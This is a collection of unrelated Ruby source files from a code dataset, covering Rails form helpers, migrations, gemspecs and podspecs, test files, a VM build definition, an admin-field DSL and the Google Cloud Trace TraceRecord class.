# - *:render_options* : options passed to `simple_fields_for, semantic_fields_for or fields_for`
# - *:locals* : the locals hash in the :render_options is handed to the partial
# - *:partial* : explicitly override the default partial name
# - *:wrap_object* : a proc that will allow to wrap your object, especially suited when using
# decorators, or if you want special initialisation
# - *:form_name* : the parameter for the form in the nested form partial. Default `f`.
# - *:count* : Count of how many objects will be added on a single click. Default `1`.
# - *&block*: see <tt>link_to</tt>
def link_to_add_association(*args, &block)
if block_given?
link_to_add_association(capture(&block), *args)
elsif args.first.respond_to?(:object)
association = args.second
name = I18n.translate("cocoon.#{association}.add", default: I18n.translate('cocoon.defaults.add'))
link_to_add_association(name, *args)
else
name, f, association, html_options = *args
html_options ||= {}
render_options = html_options.delete(:render_options)
render_options ||= {}
override_partial = html_options.delete(:partial)
wrap_object = html_options.delete(:wrap_object)
force_non_association_create = html_options.delete(:force_non_association_create) || false
form_parameter_name = html_options.delete(:form_name) || 'f'
count = html_options.delete(:count).to_i
html_options[:class] = [html_options[:class], "add_fields"].compact.join(' ')
html_options[:'data-association'] = association.to_s.singularize
html_options[:'data-associations'] = association.to_s.pluralize
new_object = create_object(f, association, force_non_association_create)
new_object = wrap_object.call(new_object) if wrap_object.respond_to?(:call)
html_options[:'data-association-insertion-template'] = CGI.escapeHTML(render_association(association, f, new_object, form_parameter_name, render_options, override_partial).to_str).html_safe
html_options[:'data-count'] = count if count > 0
link_to(name, '#', html_options)
end
end
# creates new association object with its conditions, like
# `` has_many :admin_comments, class_name: "Comment", conditions: { author: "Admin" }
# will create new Comment with author "Admin"
def create_object(f, association, force_non_association_create=false)
assoc = f.object.class.reflect_on_association(association)
assoc ? create_object_on_association(f, association, assoc, force_non_association_create) : create_object_on_non_association(f, association)
end
def get_partial_path(partial, association)
partial ? partial : association.to_s.singularize + "_fields"
end
private
def create_object_on_non_association(f, association)
builder_method = %W{build_#{association} build_#{association.to_s.singularize}}.select { |m| f.object.respond_to?(m) }.first
return f.object.send(builder_method) if builder_method
raise "Association #{association} doesn't exist on #{f.object.class}"
end
def create_object_on_association(f, association, instance, force_non_association_create)
if instance.class.name == "Mongoid::Relations::Metadata" || force_non_association_create
create_object_with_conditions(instance)
else
assoc_obj = nil
# assume ActiveRecord or compatible
if instance.collection?
assoc_obj = f.object.send(association).build
f.object.send(association).delete(assoc_obj)
else
assoc_obj = f.object.send("build_#{association}")
f.object.send(association).delete
end
assoc_obj = assoc_obj.dup if assoc_obj.frozen?
assoc_obj
end
end
def create_object_with_conditions(instance)
# in rails 4, an association is defined with a proc
# and I did not find how to extract the conditions from a scope
# except building from the scope, but then why not just build from the
# association???
conditions = instance.respond_to?(:conditions) ? instance.conditions.flatten : []
instance.klass.new(*conditions)
end
end
end
| 45.60625 | 197 | 0.66959 |
331bd0f34608514738228a7573031bba68c2611c | 378 | # frozen_string_literal: true
require "omni_attributes"
RSpec.configure do |config|
# Enable flags like --only-failures and --next-failure
config.example_status_persistence_file_path = ".rspec_status"
# Disable RSpec exposing methods globally on `Module` and `main`
config.disable_monkey_patching!
config.expect_with :rspec do |c|
c.syntax = :expect
end
end
| 23.625 | 66 | 0.759259 |
b928d827ec547164422b773c20da2e6ffb74f170 | 597 | class User < ApplicationRecord
# Include default devise modules. Others available are:
# :confirmable, :lockable, :timeoutable and :omniauthable
devise :database_authenticatable, :registerable,
:recoverable, :rememberable, :trackable, :validatable
has_many :articles
has_many :comments
include PermissionsConcern
def avatar
email_address = self.email.downcase
# create the md5 hash
hash = Digest::MD5.hexdigest(email_address)
# compile URL which can be used in <img src="RIGHT_HERE"...
image_src = "https://www.gravatar.com/avatar/#{hash}"
end
end
| 28.428571 | 63 | 0.726968 |
03a20014b0357a95318b8d6759228419278f53a8 | 2,669 | # mundi_api
#
# This file was automatically generated by APIMATIC v2.0 (
# https://apimatic.io ).
module MundiApi
# UpdateSellerRequest Model.
class UpdateSellerRequest < BaseModel
# Seller name
# @return [String]
attr_accessor :name
# Seller code
# @return [String]
attr_accessor :code
# Seller description
# @return [String]
attr_accessor :description
# Seller document CPF or CNPJ
# @return [String]
attr_accessor :document
# Seller document CPF or CNPJ
# @return [String]
attr_accessor :status
# Seller document CPF or CNPJ
# @return [String]
attr_accessor :type
# Seller document CPF or CNPJ
# @return [CreateAddressRequest]
attr_accessor :address
# Seller document CPF or CNPJ
# @return [Array<String, String>]
attr_accessor :metadata
# A mapping from model property names to API property names.
def self.names
@_hash = {} if @_hash.nil?
@_hash['name'] = 'name'
@_hash['code'] = 'code'
@_hash['description'] = 'description'
@_hash['document'] = 'document'
@_hash['status'] = 'status'
@_hash['type'] = 'type'
@_hash['address'] = 'address'
@_hash['metadata'] = 'metadata'
@_hash
end
def initialize(name = nil,
code = nil,
description = nil,
document = nil,
status = nil,
type = nil,
address = nil,
metadata = nil)
@name = name
@code = code
@description = description
@document = document
@status = status
@type = type
@address = address
@metadata = metadata
end
# Creates an instance of the object from a hash.
def self.from_hash(hash)
return nil unless hash
# Extract variables from the hash.
name = hash['name']
code = hash['code']
description = hash['description']
document = hash['document']
status = hash['status']
type = hash['type']
address = CreateAddressRequest.from_hash(hash['address']) if
hash['address']
metadata = hash['metadata']
# Create object from extracted values.
UpdateSellerRequest.new(name,
code,
description,
document,
status,
type,
address,
metadata)
end
end
end
| 26.69 | 67 | 0.520045 |
b947bfd125f6a3b5195bba5cb64a1dd5a68143ae | 271 | describe 'common/element/window' do
def before_first
screen.must_equal catalog
end
t 'before_first' do
before_first
end
t 'window_size' do
size = window_size
size.width.class.must_equal Fixnum
size.height.class.must_equal Fixnum
end
end
| 16.9375 | 39 | 0.723247 |
ac4f6b268a1b24970fcbeb54cb2fbcf4f895d6c1 | 945 | Veewee::Session.declare({
:cpu_count => '1', :memory_size=> '384',
:disk_size => '10140', :disk_format => 'VDI', :hostiocache => 'off', :ioapic => 'on', :pae => 'on',
:os_type_id => 'RedHat_64',
:iso_file => "CentOS-5.9-x86_64-bin-DVD-1of2.iso",
:iso_src => "http://mirrors.kernel.org/centos/5.9/isos/x86_64/CentOS-5.9-x86_64-bin-DVD-1of2.iso",
:iso_md5 => "c8caaa18400dfde2065d8ef58eb9e9bf",
:iso_download_timeout => 10000000,
:boot_wait => "10", :boot_cmd_sequence => [ 'linux text ks=http://%IP%:%PORT%/ks.cfg<Enter>' ],
:kickstart_port => "7122", :kickstart_timeout => 10000, :kickstart_file => "ks.cfg",
:ssh_login_timeout => "10000", :ssh_user => "vagrant", :ssh_password => "vagrant", :ssh_key => "",
:ssh_host_port => "7222", :ssh_guest_port => "22",
:sudo_cmd => "echo '%p'|sudo -S sh '%f'",
:shutdown_cmd => "/sbin/halt -h -p",
:postinstall_files => [ "postinstall.sh"], :postinstall_timeout => 10000000
})
| 55.588235 | 101 | 0.64127 |
2160d520aba2ee130a05d6a72f94f29565a1903f | 1,326 | Gem::Specification.new do |s|
s.name = "google-protobuf"
s.version = "3.12.3"
git_tag = "v#{s.version.to_s.sub('.rc.', '-rc')}" # Converts X.Y.Z.rc.N to vX.Y.Z-rcN, used for the git tag
s.licenses = ["BSD-3-Clause"]
s.summary = "Protocol Buffers"
s.description = "Protocol Buffers are Google's data interchange format."
s.homepage = "https://developers.google.com/protocol-buffers"
s.authors = ["Protobuf Authors"]
s.email = "[email protected]"
s.metadata = { "source_code_uri" => "https://github.com/protocolbuffers/protobuf/tree/#{git_tag}/ruby" }
s.require_paths = ["lib"]
s.files = Dir.glob('lib/**/*.rb')
if RUBY_PLATFORM == "java"
s.platform = "java"
s.files += ["lib/google/protobuf_java.jar"]
else
s.files += Dir.glob('ext/**/*')
s.extensions= ["ext/google/protobuf_c/extconf.rb"]
s.add_development_dependency "rake-compiler-dock", ">= 1.0.1", "< 2.0"
end
s.test_files = ["tests/basic.rb",
"tests/stress.rb",
"tests/generated_code_test.rb"]
s.required_ruby_version = '>= 2.3'
s.add_development_dependency "rake-compiler", "~> 1.1.0"
s.add_development_dependency "test-unit", '~> 3.0', '>= 3.0.9'
s.add_development_dependency "rubygems-tasks", "~> 0.2.4"
end
| 44.2 | 115 | 0.616139 |
5d9555e06381792453519e7ea1a11b3a3d1b9023 | 950 | require 'minitest/autorun'
require_relative 'hamming'
# Common test data version: 2.2.0 4c453c8
class HammingTest < Minitest::Test
def test_empty_strands
#skip
assert_equal 0, Hamming.compute('', '')
end
def test_single_letter_identical_strands
#skip
assert_equal 0, Hamming.compute('A', 'A')
end
def test_single_letter_different_strands
#skip
assert_equal 1, Hamming.compute('G', 'T')
end
def test_long_identical_strands
#skip
assert_equal 0, Hamming.compute('GGACTGAAATCTG', 'GGACTGAAATCTG')
end
def test_long_different_strands
#skip
assert_equal 9, Hamming.compute('GGACGGATTCTG', 'AGGACGGATTCT')
end
def test_disallow_first_strand_longer
#skip
assert_raises(ArgumentError) do
Hamming.compute('AATG', 'AAA')
end
end
def test_disallow_second_strand_longer
#skip
assert_raises(ArgumentError) do
Hamming.compute('ATA', 'AGTG')
end
end
end
| 21.111111 | 69 | 0.716842 |
d548c00ce10e1375d5af868ed63751eb8e4d4f58 | 243 | class ConfirmExistingUsers < SeedMigration::Migration
def up
User.where(confirmed_at: nil).find_each do |user|
user.skip_confirmation!
user.skip_confirmation_notification!
user.save
end
end
def down
end
end
| 17.357143 | 53 | 0.711934 |
6a09a6a1410a204830b1c532c5eb6e59259b5047 | 456 | $simport.r 'iek/rgss3_ext/plane', '1.0.0', 'Extends Plane Class'
class Plane
# Planes don't have an update method, this usually causes a few 'gotchas!'
def update
end
##
# @return [Void]
def dispose_bitmap
self.bitmap.dispose
end
##
# @return [Void]
def dispose_bitmap_safe
dispose_bitmap if self.bitmap && !self.bitmap.disposed?
end
##
# @return [Void]
def dispose_all
dispose_bitmap_safe
dispose
end
end
| 16.888889 | 76 | 0.66886 |
87f1738e3b9cc4d5720a676c694d39f3d123849a | 2,134 | #
# Author:: Christopher Walters (<[email protected]>)
# Author:: Mark Anderson (<[email protected]>)
# Copyright:: Copyright (c) 2010-2011 Opscode, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'rubygems'
$:.unshift(File.expand_path("../../ext/dep_gecode", __FILE__))
require 'dep_selector'
require 'pp'
RSpec.configure do |config|
config.run_all_when_everything_filtered = true
config.treat_symbols_as_metadata_keys_with_true_values = true
config.filter_run :focus => true
config.filter_run_excluding :external => true
# Tests that randomly fail, but may have value.
config.filter_run_excluding :volatile => true
end
def setup_constraint(dep_graph, cset)
cset.each do |cb_version|
package_name = cb_version["key"].first
version = DepSelector::Version.new(cb_version["key"].last)
dependencies = cb_version['value']
pv = dep_graph.package(package_name).add_version(version)
dependencies.each_pair do |dep_name, constraint_str|
constraint = DepSelector::VersionConstraint.new(constraint_str)
pv.dependencies << DepSelector::Dependency.new(dep_graph.package(dep_name), constraint)
end
end
end
def setup_soln_constraints(dep_graph, soln_constraints)
soln_constraints.map do |elt|
pkg = dep_graph.package(elt.shift)
constraint = DepSelector::VersionConstraint.new(elt.shift)
DepSelector::SolutionConstraint.new(pkg, constraint)
end
end
def verify_solution(observed, expected)
versions = expected.inject({}){|acc, elt| acc[elt.first]=DepSelector::Version.new(elt.last) ; acc}
observed.should == versions
end
| 34.419355 | 100 | 0.754452 |
1c8f7987a43a9cfdfc41559f46b08cce11ae6eea | 952 | # frozen_string_literal: true
module Vnstat
module Traffic
##
# A class representing a collection of tracked tops.
class Tops < Base
##
# Iterates over all results in the collection.
#
# @overload each
# @return [Enumerator]
#
# @overload each(&block)
# @yield [result]
# @yieldparam [Result::Minute] result
# @return [Tops]
def each(&block)
to_a.each(&block)
end
##
# Fetches a single {Result::Minute} from the collection.
#
# @param [Integer] index The index of the entry in the collection.
# @return [Result::Minute]
def [](index)
to_a[index]
end
##
# @return [Array<Result::Minute>]
def to_a
elements = traffic_data.xpath('tops/top')
elements.map do |element|
Result::Minute.extract_from_xml_element(element)
end
end
end
end
end
| 22.666667 | 72 | 0.561975 |
d5c8210d2dde0cbe6260b7640af3d5df74086588 | 277 | class AddResetPasswordFields < ActiveRecord::Migration[6.0]
def change
add_column :users, :reset_password_token, :string, default: nil
add_column :users, :reset_password_token_expires_at, :datetime, default: nil
add_index :users, :reset_password_token
end
end
| 34.625 | 80 | 0.772563 |
61f26062bdd6a00bb458594776fe7fbe55f785b9 | 465 | class CreateIntegrations < ActiveRecord::Migration
def self.up
create_table :integrations do |t|
t.belongs_to :conference
t.integer :integration_type
t.string :key
t.string :url
t.string :integration_config_key
t.timestamps
end
add_foreign_key :integrations, :conferences
add_index :integrations, [:conference_id, :integration_type], unique: true
end
def self.down
drop_table :integrations
end
end
| 22.142857 | 78 | 0.705376 |
38e087939f71adf88aba69ec42b9686851929c51 | 2,148 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
package = JSON.parse(File.read(File.expand_path('../../package.json', __dir__)))
version = package['version']
source = { :git => ENV['INSTALL_YOGA_FROM_LOCATION'] || 'https://github.com/facebook/react-native.git' }
if version == '1000.0.0'
# This is an unpublished version, use the latest commit hash of the react-native repo, which we’re presumably in.
source[:commit] = `git rev-parse HEAD`.strip
else
source[:tag] = "v#{version}"
end
Pod::Spec.new do |spec|
spec.name = 'Yoga'
spec.version = '1.14.0'
spec.license = { :type => 'MIT' }
spec.homepage = 'https://yogalayout.com'
spec.documentation_url = 'https://yogalayout.com/docs/'
spec.summary = 'Yoga is a cross-platform layout engine which implements Flexbox.'
spec.description = 'Yoga is a cross-platform layout engine enabling maximum collaboration within your team by implementing an API many designers are familiar with, and opening it up to developers across different platforms.'
spec.authors = 'Facebook'
spec.source = source
spec.module_name = 'yoga'
spec.header_dir = 'yoga'
spec.requires_arc = false
spec.pod_target_xcconfig = {
'DEFINES_MODULE' => 'YES'
}
spec.compiler_flags = [
'-fno-omit-frame-pointer',
'-fexceptions',
'-Wall',
'-Werror',
'-std=c++1y',
'-fPIC'
]
# Pinning to the same version as React.podspec.
spec.platforms = { :ios => "10.0", :tvos => "10.0", :osx => "10.14" }
# Set this environment variable when *not* using the `:path` option to install the pod.
# E.g. when publishing this spec to a spec repo.
source_files = 'yoga/**/*.{cpp,h}'
source_files = File.join('ReactCommon/yoga', source_files) if ENV['INSTALL_YOGA_WITHOUT_PATH_OPTION']
spec.source_files = source_files
header_files = 'yoga/{Yoga,YGEnums,YGMacros,YGValue}.h'
header_files = File.join('ReactCommon/yoga', header_files) if ENV['INSTALL_YOGA_WITHOUT_PATH_OPTION']
spec.public_header_files = header_files
end
| 37.034483 | 226 | 0.698324 |
ff17839b97b8dc97e65fcdd870d2668416f006c4 | 430 | Gem::Specification.new do |s|
s.name = 'hebruby'
s.version = '2.1.0'
s.date = '2016-05-20'
s.summary = "Convert Hebrew dates to/from Julian dates"
s.description = "Convert Hebrew dates to/from Julian dates"
s.authors = ["Ron Evans"]
s.email = '[email protected]'
s.files = ["lib/hebruby.rb"]
s.homepage =
'http://rubygems.org/gems/hebruby'
s.license = 'MIT'
end
| 30.714286 | 61 | 0.57907 |
338df6d4dc185d5ee437003238eb8fdde8d69cf3 | 1,682 | class Admin::DocsController < Admin::BaseController
before_action :verify_editor
respond_to :html, only: ['new','edit','create']
respond_to :js, only: ['destroy']
def new
@doc = Doc.new
@doc.category_id = params[:category_id]
@doc.body = Post.where(id: params[:post_id]).first.body if params[:post_id]
@categories = Category.alpha
end
def edit
@doc = Doc.find(params[:id])
@category = Category.where(id: params[:category_id]).first
@categories = Category.alpha
end
def create
@doc = Doc.new(doc_params)
@doc.user_id = current_user.id
if @doc.save
redirect_to(admin_category_path(@doc.category.id))
else
render 'new'
end
end
def update
unless params['lang'].nil?
I18n.locale = params['lang']
end
@doc = Doc.where(id: params[:id]).first
@category = @doc.category
# @doc.tag_list = params[:doc][:tag_list]
if @doc.update_attributes(doc_params)
respond_to do |format|
format.html {
redirect_to(admin_category_path(@category.id))
}
format.js {
}
end
else
respond_to do |format|
format.html {
render 'edit', id: @doc
}
end
end
end
def destroy
@doc = Doc.find(params[:id])
@doc.destroy
render js:"
$('#doc-#{@doc.id}').fadeOut();
Helpy.ready();
Helpy.track();"
end
private
def doc_params
params.require(:doc).permit(
:title,
:body,
:keywords,
:title_tag,
:meta_description,
:category_id,
:rank,
:active,
:front_page,
:allow_comments,
{screenshots: []},
:tag_list
)
end
end
| 20.02381 | 79 | 0.593341 |
61c2a380a3f1dbdadeb6b59cb901422dd097680f | 7,591 | require 'active_support/concern'
require 'radmin/fields/types'
module Radmin
module Utils
module HasFields
def fields
_fields
end
def find_field(name)
_fields[name.to_s]
end
def field(name, type = nil, &block)
name = name.to_s
mdl_name = abstract_model.to_param
return if
Radmin::Config::excluded_fields[mdl_name]&.[](name) ||
Radmin::Config::excluded_fields[nil]&.[](name)
type ||=
Radmin::Config::field_types&.[](mdl_name)&.[](name) ||
begin
rel_info = abstract_model.relations_info[name]
if rel_info
rel_klass = rel_info.polymorphic? ? nil : rel_info.klass
abstract_model.properties[name] = {
klass: rel_klass,
primary_key: rel_klass&.primary_key,
foreign_key: rel_info.foreign_key,
reflection_type: rel_info.macro.to_sym,
name: rel_info.name,
is_polymorphic: rel_info.polymorphic?
}
rel_info.macro.to_sym
else
column_info = abstract_model.columns_info[name]
if !column_info && !abstract_model.model.respond_to?(name)
raise "Unknown attribute '#{name}' in model '#{abstract_model.model}'"
end
column_info && column_info.type || :string
end
end
if _fields[name]
target_group = get_group(_fields[name].group || DEFAULT_GROUP)
target_group.remove_field(name)
end
field =
(
_fields[name] =
Radmin::Fields::Types.load(type).new(self, name)
)
# # some fields are hidden by default (belongs_to keys, has_many associations in list views.)
# # unhide them if config specifically defines them
# if field
# field.show unless field.instance_variable_get("@#{field.name}_registered").is_a?(Proc)
# end
#
# # Specify field as virtual if type is not specifically set and field was not
# # found in default stack
# if field.nil? && type.nil?
# field = (_fields << RailsAdmin::Config::Fields::Types.load(:string).new(self, name, nil)).last
#
# # Register a custom field type if one is provided and it is different from
# # one found in default stack
# elsif type && type != (field.nil? ? nil : field.type)
# if field
# properties = field.properties
# field = _fields[_fields.index(field)] = RailsAdmin::Config::Fields::Types.load(type).new(self, name, properties)
# else
# properties = abstract_model.properties.detect { |p| name == p.name }
# field = (_fields << RailsAdmin::Config::Fields::Types.load(type).new(self, name, properties)).last
# end
# end
#
# # If field has not been yet defined add some default properties
# if add_to_section && !field.defined
# field.defined = true
# field.order = _fields.count(&:defined)
# end
#
# If a block has been given evaluate it and sort fields after that
field.instance_eval(&block) if block
field.default_value || begin
val = abstract_model.columns_info[name]&.default
field.default_value(proc { val })
end
target_group = get_group(field.group || DEFAULT_GROUP)
target_group.append_field(name, field)
field
end
# include fields by name and apply an optionnal block to each (through a call to fields),
# or include fields by conditions if no field names
def include_fields(*field_names, &block)
items = field_names.empty? ? abstract_model.model_fields : field_names
items.each do |item|
field(item, nil, &block)
end
end
# exclude fields by name or by condition (block)
def exclude_fields(*field_names, &block)
block ||= proc { |f| field_names.include?(f.name) }
_fields.each { |f| f.defined = true } if _fields.select(&:defined).empty?
_fields.select { |f| f.instance_eval(&block) }.each { |f| f.defined = false }
end
# API candy
alias_method :exclude_fields_if, :exclude_fields
alias_method :include_fields_if, :include_fields
def include_all_fields
include_fields_if { true }
end
# # Returns all field configurations for the model configuration instance. If no fields
# # have been defined returns all fields. Defined fields are sorted to match their
# # order property. If order was not specified it will match the order in which fields
# # were defined.
# #
# # If a block is passed it will be evaluated in the context of each field
# def fields(*field_names, &block)
# return all_fields if field_names.empty? && !block
#
# if field_names.empty?
# defined = _fields.select(&:defined)
# defined = _fields if defined.empty?
# else
# defined = field_names.collect { |field_name| _fields.detect { |f| f.name == field_name } }
# end
# defined.collect do |f|
# unless f.defined
# f.defined = true
# f.order = _fields.count(&:defined)
# end
# f.instance_eval(&block) if block
# f
# end
# end
#
# # Defines configuration for fields by their type.
# def fields_of_type(type, &block)
# _fields.select { |f| type == f.type }.map! { |f| f.instance_eval(&block) } if block
# end
#
# # Accessor for all fields
# def all_fields
# ((ro_fields = _fields(true)).select(&:defined).presence || ro_fields).collect do |f|
# f.section = self
# f
# end
# end
#
# Get all fields defined as visible, in the correct order.
def visible_fields
# i = 0
_fields.values.collect { |f| f.with_bindings(bindings) }.select(&:visible)#.sort_by { |f| [f.order, i += 1] }
end
protected
def _fields
@_fields ||= {}
# return @_fields if @_fields
# return @_ro_fields if readonly && @_ro_fields
#
# if self.class == RailsAdmin::Config::Sections::Base
# @_ro_fields = @_fields = RailsAdmin::Config::Fields.factory(self)
# else
# # parent is RailsAdmin::Config::Model, recursion is on Section's classes
# @_ro_fields ||= parent.send(self.class.superclass.to_s.underscore.split('/').last)._fields(true).freeze
# end
# readonly ? @_ro_fields : (@_fields ||= @_ro_fields.collect(&:clone))
end
#
# # Raw fields.
# # Recursively returns parent section's raw fields
# # Duping it if accessed for modification.
# def _fields(readonly = false)
# return @_fields if @_fields
# return @_ro_fields if readonly && @_ro_fields
#
# if self.class == RailsAdmin::Config::Sections::Base
# @_ro_fields = @_fields = RailsAdmin::Config::Fields.factory(self)
# else
# # parent is RailsAdmin::Config::Model, recursion is on Section's classes
# @_ro_fields ||= parent.send(self.class.superclass.to_s.underscore.split('/').last)._fields(true).freeze
# end
# readonly ? @_ro_fields : (@_fields ||= @_ro_fields.collect(&:clone))
# end
# end
end
end
end | 35.306977 | 126 | 0.583981 |
62a22a5c67bbd60ee0431461df46ef55488ee726 | 982 | # frozen_string_literal: true
module Lightning
module IO
class Broadcast < Concurrent::Actor::RestartingContext
include Algebrick
def initialize
@receivers = {}
end
def on_message(message)
match message, (on Array.(:subscribe, ~any) do |type|
if envelope.sender.is_a? Concurrent::Actor::Reference
@receivers[type.name] ||= []
@receivers[type.name] << envelope.sender
end
end), (on :unsubscribe do
@receivers.each { |type, receiver| receiver.delete(envelope.sender) }
end), (on Array.(:subscribe?, ~any) do |type|
@receivers[type.name]&.include?(envelope.sender)
end), (on any do
key = if message&.respond_to?(:type) && message.type.respond_to?(:name)
message.type.name
else
message.class.name
end
@receivers[key]&.each { |r| r << message }
end)
end
end
end
end
| 28.882353 | 81 | 0.57332 |
6141531108b43fe7301fbebd11506987a9205f07 | 339 | FileUploadError = Struct.new(:message, :suggestion, :link_options) do
def suggestion_with_link
if link_options
url = link_options[:url]
placeholder = link_options[:placeholder]
suggestion.sub(
/\[#{placeholder}\]/, "<a href=\"#{url}\">#{placeholder}</a>"
)
else
suggestion
end
end
end
| 24.214286 | 69 | 0.622419 |
5df583c9ba4ee44dd2b6345fbbd5dfb034444674 | 11,605 | # Copyright 2014 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require "date"
require "google/devtools/cloudtrace/v1/trace_pb"
require "stackdriver/core/trace_context"
module Google
module Cloud
module Trace
##
# Trace represents an entire trace record.
#
# A trace has an ID and contains a forest of spans. The trace object
# methods may be used to walk or manipulate the set of spans.
#
# @example
# require "google/cloud/trace"
#
# env = {}
# trace_context = Stackdriver::Core::TraceContext.parse_rack_env env
#
# trace = Google::Cloud::Trace::TraceRecord.new "my-project",
# trace_context
# span = trace.create_span "root_span"
# subspan = span.create_span "subspan"
#
# trace_proto = trace.to_grpc
#
class TraceRecord
##
# Create an empty Trace object. If a trace context is provided, it is
# used to locate this trace within that context.
#
# @param [String] project_id The ID of the project containing this
# trace.
# @param [Stackdriver::Core::TraceContext] trace_context The context
# within which to locate this trace (i.e. sets the trace ID and
# the context parent span, if present.) If no context is provided,
# a new trace with a new trace ID is created.
#
def initialize project_id, trace_context = nil, span_id_generator: nil
@project_id = project_id
@trace_context = trace_context || Stackdriver::Core::TraceContext.new
@root_spans = []
@spans_by_id = {}
@span_id_generator =
span_id_generator || ::Proc.new { rand(1..0xffffffffffffffff) }
end
##
# Standard value equality check for this object.
#
# @param [Object] other Object to compare with
# @return [Boolean]
#
def eql? other
other.is_a?(Google::Cloud::Trace::TraceRecord) &&
trace_context == other.trace_context &&
@spans_by_id == other.instance_variable_get(:@spans_by_id)
end
alias == eql?
##
# Create a new Trace object from a trace protobuf.
#
# @param [Google::Cloud::Trace::V1::Trace] trace_proto The
# trace protobuf from the V1 gRPC Trace API.
# @return [Trace, nil] A corresponding Trace object, or `nil` if the
# proto does not represent an existing trace object.
#
def self.from_grpc trace_proto
trace_id = trace_proto.trace_id.to_s
return nil if trace_id.empty?
span_protos = trace_proto.spans
parent_span_ids = find_root_span_ids span_protos
span_id = parent_span_ids.size == 1 ? parent_span_ids.first : 0
span_id = nil if span_id.zero?
tc = Stackdriver::Core::TraceContext.new trace_id: trace_id,
span_id: span_id
trace = new trace_proto.project_id, tc
until parent_span_ids.empty?
parent_span_ids = trace.add_span_protos span_protos, parent_span_ids
end
trace
end
##
# Convert this Trace object to an equivalent Trace protobuf suitable
# for the V1 gRPC Trace API.
#
# @return [Google::Cloud::Trace::V1::Trace] The generated
# protobuf.
#
def to_grpc
span_protos = @spans_by_id.values.map do |span|
span.to_grpc trace_context.span_id.to_i
end
Google::Cloud::Trace::V1::Trace.new \
project_id: project_id,
trace_id: trace_id,
spans: span_protos
end
##
# The project ID for this trace.
#
# @return [String]
#
attr_reader :project_id
alias project project_id
##
# The context for this trace.
#
# @return [Stackdriver::Core::TraceContext]
#
attr_reader :trace_context
##
# The ID string for the trace.
#
# @return [String]
#
def trace_id
trace_context.trace_id
end
##
# Returns an array of all spans in this trace, not in any particular
# order
#
# @return [Array{TraceSpan}]
#
def all_spans
@spans_by_id.values
end
##
# Returns an array of all root spans in this trace, not in any
# particular order
#
# @return [Array{TraceSpan}]
#
def root_spans
@root_spans.dup
end
##
# Creates a new span in this trace.
#
# @param [String] name The name of the span.
# @param [Integer] span_id The numeric ID of the span, or nil to
# generate a new random unique ID. Optional (defaults to nil).
# @param [Integer] parent_span_id The span ID of the parent span, or 0
# if this should be a new root span within the context. Note that
# a root span would not necessarily end up with a parent ID of 0 if
# the trace context specifies a different context span ID. Optional
# (defaults to 0).
# @param [SpanKind] kind The kind of span. Optional.
# @param [Time] start_time The starting timestamp, or nil if not yet
# specified. Optional (defaults to nil).
# @param [Time] end_time The ending timestamp, or nil if not yet
# specified. Optional (defaults to nil).
# @param [Hash{String=>String}] labels The span properties. Optional
# (defaults to empty).
# @return [TraceSpan] The created span.
#
# @example
# require "google/cloud/trace"
#
# trace_record = Google::Cloud::Trace::TraceRecord.new "my-project"
# span = trace_record.create_span "root_span"
#
def create_span name, span_id: nil, parent_span_id: 0,
kind: SpanKind::UNSPECIFIED,
start_time: nil, end_time: nil,
labels: {}
parent_span_id = parent_span_id.to_i
parent_span_id = trace_context.span_id.to_i if parent_span_id.zero?
parent_span = @spans_by_id[parent_span_id]
if parent_span
parent_span.create_span name,
span_id: span_id,
kind: kind,
start_time: start_time,
end_time: end_time,
labels: labels
else
internal_create_span nil, span_id, parent_span_id, name, kind,
start_time, end_time, labels
end
end
##
# Creates a root span around the given block. Automatically populates
# the start and end timestamps. The span (with start time but not end
# time populated) is yielded to the block.
#
# @param [String] name The name of the span.
# @param [SpanKind] kind The kind of span. Optional.
# @param [Hash{String=>String}] labels The span properties. Optional
# (defaults to empty).
# @return [TraceSpan] The created span.
#
# @example
# require "google/cloud/trace"
#
# trace_record = Google::Cloud::Trace::TraceRecord.new "my-project"
# trace_record.in_span "root_span" do |span|
# # Do stuff...
# end
#
def in_span name, kind: SpanKind::UNSPECIFIED, labels: {}
span = create_span name, kind: kind, labels: labels
span.start!
yield span
ensure
span.finish!
end
##
# Internal implementation of span creation. Ensures that a span ID has
# been allocated, and that the span appears in the internal indexes.
#
# @private
#
def internal_create_span parent, span_id, parent_span_id, name, kind,
start_time, end_time, labels
span_id = span_id.to_i
parent_span_id = parent_span_id.to_i
span_id = unique_span_id if span_id.zero?
span = Google::Cloud::Trace::Span.new \
self, span_id, parent_span_id, parent, name, kind,
start_time, end_time, labels
@root_spans << span if parent.nil?
@spans_by_id[span_id] = span
span
end
##
# Generates and returns a span ID that is unique in this trace.
#
# @private
#
def unique_span_id
loop do
id = @span_id_generator.call
return id if !@spans_by_id.include?(id) &&
id != trace_context.span_id.to_i
end
end
##
# Add the given span to the list of root spans.
#
# @private
#
def add_root span
@root_spans << span
end
##
# Remove the given span from the list of root spans.
#
# @private
#
def remove_root span
@root_spans.delete span
end
##
# Remove the given span from the list of spans overall.
#
# @private
#
def remove_span span
@root_spans.delete span
@spans_by_id.delete span.span_id
end
##
# Given a list of span protobufs, find the "root" span IDs, i.e. all
# parent span IDs that don't correspond to actual spans in the set.
#
# @private
#
def self.find_root_span_ids span_protos
span_ids = ::Set.new span_protos.map(&:span_id)
root_protos = span_protos.find_all do |sp|
!span_ids.include? sp.parent_span_id
end
::Set.new root_protos.map(&:parent_span_id)
end
##
# Given a list of span protobufs and a set of parent span IDs, add
# for all spans whose parent is in the set, convert the span to a
# `TraceSpan` object and add it into this trace. Returns the IDs of
# the spans added, which may be used in a subsequent call to this
# method. Effectively, repeated calls to this method perform a
# breadth-first walk of the span protos and populate the TraceRecord
# accordingly.
#
# @private
#
